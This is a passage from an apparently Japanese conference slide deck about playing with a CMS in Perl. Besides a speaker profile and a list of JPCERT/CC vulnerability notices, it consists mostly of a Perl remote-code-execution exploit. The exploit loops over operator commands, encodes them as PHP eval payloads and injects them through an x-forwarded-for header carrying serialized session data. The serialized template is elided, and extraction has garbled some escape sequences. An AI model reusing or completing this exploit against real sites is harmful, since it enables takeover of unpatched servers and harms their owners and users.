More Related Content
Similar to CMSとPerlで遊ぼう (20)
CMSとPerlで遊ぼう
- 2. @mahoyaya
• Name: mahoyaya
• Work: NWインフラ(?)
• Favorite: DIY
• Twitter: @mahoyaya
• blog: http://mahoyaya.hateblo.jp
• GitHub: https://github.com/mahoyaya
- 5. • <<< JPCERT/CC WEEKLY REPORT 2015-12-24 >>>
• 【1】ISC BIND 9 にサービス運用妨害 (DoS) の脆弱性
• 【2】Joomla! に複数の脆弱性
• 【3】Firefox に複数の脆弱性
• 【4】Ruby の標準添付ライブラリに脆弱性
• 【5】Symantec Endpoint Encryption に情報漏えいの脆弱性
• 【6】ScreenOS に複数の脆弱性
• 【7】WordPress 用プラグイン Welcart に SQL インジェクションの脆弱性
• 【8】WinRAR の実行ファイル読込みに脆弱性
• 【9】Ipswitch WhatsUp Gold に複数の脆弱性
- 9. while(1) {
my $response_header = "";
#========================#
# get command #
#========================#
my $cmd_str = getCmd();
last if $cmd_str =~ m/Aquitz/;
$cmd_str =~ s/^(.+)$/system(’$1');/;
info($cmd_str);
#=========================#
# connect to remote host #
#=========================#
for(my $i = 0; $i < 3; $i++){
# generate payload string
my $request_str = generate_payload($cmd_str, @ary_cookies);
#info($request_str);
info("connect to $host:$port");
info("[send data] " . $request_str);
my $sock;
socket($sock, PF_INET, SOCK_STREAM, 0) or die "can't open socketn";
connect($sock, $sock_addr) or die "can't connect remote hostn";
# no buffered sock $sock
select($sock); $|=1; select(STDOUT);
ssend($sock, $request_str);
#=====================#
# get http response #
#=====================#
# print headers
$response_header = "";
while (<$sock>){
print $_;
$response_header .= $_;
last if m/^rn$/;
}
# print body
$|=1;
while (<$sock>){
if( $print > 0){
print $_;
}
}
#====================================#
# get cookie and print status code #
#====================================#
for my $line (split("rn", $response_header)){
if($line =~ m/ASet-Cookie: /){
$line =~ s/ASet-//;
my @ary = split(";", $line);
push(@ary_cookies, $ary[0]);
info("<" . $ary[0] . ">");
} elsif($line =~ m|AHTTP/1.1 |){
my $status = $line;
$status =~ s|AHTTP/1.1 ([0-9]{3}) .+z|$1|;
info("<Response: " . $status . ">");
}
}
close($sock) if defined $sock;
print "================================n";
} # end for loop
} # end while
- 10. sub php_str_noquotes {
my $data = shift;
my $encoded = "";
for(split("", $data)){
$encoded .= 'chr(' . unpack("C", $_) . ').';
}
return substr($encoded, 0, length($encoded) - 1);
}
sub generate_payload {
my $php_payload = shift;
my $aref_cookies = shift;
my $request_str = "";
$php_payload = 'eval(' . php_str_noquotes($php_payload) . ')';
my $terminate = "xf0xfdxfdxfd";
my $exploit_template = <シリアライズしたセッションデータ+$php_payload>
$exploit_template .= $terminate; #utf8 4byte char
# set headers
my $ua = 'User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3';
my $xff = 'x-forwarded-for: ' . $exploit_template;
$request_str = append($request_str, "GET " . $request_url . " HTTP/1.1");
$request_str = append($request_str, "Host: " . $host . ":" . $port);
$request_str = append($request_str, "Accept-Encoding: gzip, deflate");
$request_str = append($request_str, $xff);
$request_str = append($request_str, "Accept: */*");
$request_str = append($request_str, $ua);
$request_str = append($request_str, "Connection: close");
$request_str = appendAll($request_str, $aref_cookies);
$request_str = append($request_str, "");
return $request_str;
}